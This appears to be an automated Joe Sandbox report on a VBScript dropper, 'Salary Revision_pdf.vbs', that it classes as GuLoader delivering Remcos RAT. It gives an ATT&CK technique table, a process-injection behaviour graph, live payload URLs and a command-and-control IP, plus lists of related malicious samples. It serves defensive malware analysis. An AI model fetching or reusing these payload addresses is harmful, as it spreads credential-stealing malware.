              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)412
              Process Injection
              1
              Software Packing
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS28
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets141
              Security Software Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538691 Sample: Salary Revision_pdf.vbs Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 32 sf4l.shop 2->32 34 geoplugin.net 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 10 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 52 Early bird code injection technique detected 8->52 54 Writes to foreign memory regions 8->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 8->56 58 Queues an APC in another process (thread injection) 8->58 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 66 2 other signatures 11->66 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 36 154.216.18.214, 2404, 49960, 49971 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->36 38 geoplugin.net 178.237.33.50, 49972, 80 ATOM86-ASATOM86NL Netherlands 13->38 68 Detected Remcos RAT 13->68 70 Tries to steal Mail credentials (via file registry) 13->70 72 Maps a DLL or memory area into another process 13->72 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        28 msiexec.exe 13->28         started        40 sf4l.shop 188.114.97.3, 443, 49746, 49930 CLOUDFLARENETUS European Union 19->40 74 Found suspicious powershell code related to unpacking or dynamic code loading 19->74 30 conhost.exe 19->30         started        signatures8 process9 signatures10 50 Tries to harvest and steal browser information (history, passwords, etc) 21->50

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Salary Revision_pdf.vbs13%ReversingLabsScript-WScript.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                unknown
                sf4l.shop
                188.114.97.3
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  unknown
                  https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binfalse
                    unknown
                    https://sf4l.shop/zWAbmrmP/Diwani.pfbfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Pbhv528A.tmp.11.drfalse
                        unknown
                        https://www.office.com/bhv528A.tmp.11.drfalse
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9bhv528A.tmp.11.drfalse
                            unknown
                            http://www.imvu.comrmsiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://sf4l.shop/msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://geoplugin.net/json.gplmsiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://aefd.nelreports.net/api/report?cat=bingthbhv528A.tmp.11.drfalse
                                    unknown
                                    https://go.micropowershell.exe, 00000002.00000002.1487804584.000001C4E55FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://geoplugin.net/json.gppmsiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.imvu.commsiexec.exe, msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://aefd.nelreports.net/api/report?cat=wsbbhv528A.tmp.11.drfalse
                                        unknown
                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.imvu.comppDatamsiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.nirsoft.netmsiexec.exe, 0000000B.00000002.1811369548.00000000029A2000.00000004.00000010.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aefd.nelreports.net/api/report?cat=bingaotakbhv528A.tmp.11.drfalse
                                              unknown
                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv528A.tmp.11.drfalse
                                                unknown
                                                https://deff.nelreports.net/api/report?cat=msnbhv528A.tmp.11.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05bhv528A.tmp.11.drfalse
                                                  unknown
                                                  https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58bhv528A.tmp.11.drfalse
                                                    unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://sf4l.shoppowershell.exe, 00000002.00000002.1487804584.000001C4E66A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          unknown
                                                          https://sf4l.shop/zWAbmrmP/Diwani.pfbPpowershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://www.google.commsiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              unknown
                                                              https://aefd.nelreports.net/api/report?cat=bingaotbhv528A.tmp.11.drfalse
                                                                unknown
                                                                https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8ebbhv528A.tmp.11.drfalse
                                                                  unknown
                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv528A.tmp.11.drfalse
                                                                    unknown
                                                                    https://sf4l.shoppowershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1487804584.000001C4E640C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://contoso.com/powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binzwmsiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://aefd.nelreports.net/api/report?cat=bingrmsbhv528A.tmp.11.drfalse
                                                                          unknown
                                                                          https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                            unknown
                                                                            https://login.yahoo.com/config/loginmsiexec.exefalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.nirsoft.net/msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://sf4l.shop/zWAbmrmP/Diwani.pfbXRpowershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv528A.tmp.11.drfalse
                                                                                  unknown
                                                                                  http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  188.114.97.3
                                                                                  sf4l.shopEuropean Union
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  154.216.18.214
                                                                                  unknownSeychelles
                                                                                  135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                                  178.237.33.50
                                                                                  geoplugin.netNetherlands
                                                                                  8455ATOM86-ASATOM86NLfalse
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1538691
                                                                                  Start date and time:2024-10-21 17:04:11 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 2s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:17
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Salary Revision_pdf.vbs
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winVBS@16/12@2/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 66.7%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 97%
                                                                                  • Number of executed functions: 170
                                                                                  • Number of non-executed functions: 265
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .vbs
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7844 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: Salary Revision_pdf.vbs
                                                                                  TimeTypeDescription
                                                                                  11:05:16API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                  11:05:24API Interceptor81x Sleep call for process: powershell.exe modified
                                                                                  11:06:34API Interceptor460614x Sleep call for process: msiexec.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  188.114.97.3request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                  • www.ergeneescortg.xyz/guou/
                                                                                  Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.thetahostthe.top/9r5x/
                                                                                  http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                  • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                  • servicetelemetryserver.shop/api/index.php
                                                                                  SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                  • servicetelemetryserver.shop/api/index.php
                                                                                  SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                  • servicetelemetryserver.shop/api/index.php
                                                                                  ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                                                                                  • tipinfodownload-soft1.com/g9jvjfd73/index.php
                                                                                  aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                                  • main.dsn.ovh/dns/loadbit
                                                                                  PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.freedietbuilder.online/nnla/
                                                                                  NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                  • www.ergeneescortg.xyz/guou/
                                                                                  154.216.18.214CI+PL_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        geoplugin.netOrder.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUShttps://lambdachi.univer.se/Get hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        INV00663.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.26.12.222
                                                                                        https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        index.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.24.163
                                                                                        8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 188.114.96.3
                                                                                        http://tfmk.sweepshop.info/fwd/P2Q9OTU0NCZlaT00NDM2NzYzMSZpZj0zMTYwJmxpPTczNwGet hashmaliciousPhisherBrowse
                                                                                        • 104.26.14.63
                                                                                        index.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.24.163
                                                                                        https://anviict.com/?qvtvxymbGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.95.41
                                                                                        message(1).emlGet hashmaliciousUnknownBrowse
                                                                                        • 104.16.79.73
                                                                                        file.exeGet hashmaliciousLummaC, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.206.204
                                                                                        ATOM86-ASATOM86NLOrder.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 178.237.33.50
                                                                                        lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                        • 178.237.33.50
                                                                                        172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                                                        • 178.237.33.50
                                                                                        Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                                                        • 178.237.33.50
                                                                                        nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        SKHT-ASShenzhenKatherineHengTechnologyInformationCoOrder.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 154.216.17.141
                                                                                        bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        • 154.216.17.159
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eOrder.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 188.114.97.3
                                                                                        index.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                        • 188.114.97.3
                                                                                        https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                        • 188.114.97.3
                                                                                        index.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        TENDER ADDENDUM NO. 01.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        RFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        37f463bf4616ecd445d4a1937da06e19Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 188.114.97.3
                                                                                        proforma.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        FACTURA DE PAGO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        No context
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):71954
                                                                                        Entropy (8bit):7.996617769952133
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
